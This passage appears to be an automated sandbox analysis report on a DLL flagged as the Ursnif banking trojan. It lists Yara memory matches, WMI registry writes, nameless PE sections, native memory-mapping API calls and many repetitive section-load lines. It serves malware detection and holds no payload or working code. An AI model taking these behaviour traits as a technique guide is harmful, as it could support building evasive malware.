                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      PE file has nameless sections
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Source: qT9Qk5aKTk.dll Static PE information: section name:
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: qT9Qk5aKTk.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00401D9F NtMapViewOfSection
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00401EB5 GetProcAddress, NtCreateSection, memset
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00402375 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F983B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F9B341 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_01360066 NtAllocateVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0136009C NtAllocateVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_01360285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_026D1EB5 GetProcAddress, NtCreateSection, memset
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_026D1D9F NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_026D2375 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_023E83B7 NtOpenProcess, NtOpenProcessToken, NtQueryInformationToken, NtQueryInformationToken, NtQueryInformationToken, memcpy, NtClose, NtClose
                      Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_023EB341 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_035E009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_035E0066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 5_2_035E0285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_02FF009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_02FF0066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_02FF0285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_02AE0066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_02AE0285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 12_2_02AE009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 19_2_03290285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 19_2_03290066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 19_2_0329009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 24_2_008A0066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 24_2_008A0285 NtProtectVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 24_2_008A009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 29_2_0092009C NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 29_2_00920066 NtAllocateVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 29_2_00920285 NtProtectVirtualMemory
                      Source: qT9Qk5aKTk.dll, Binary or memory string: OriginalFilename RPCTEST.DLL vs qT9Qk5aKTk.dll
                      Source: qT9Qk5aKTk.dll, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
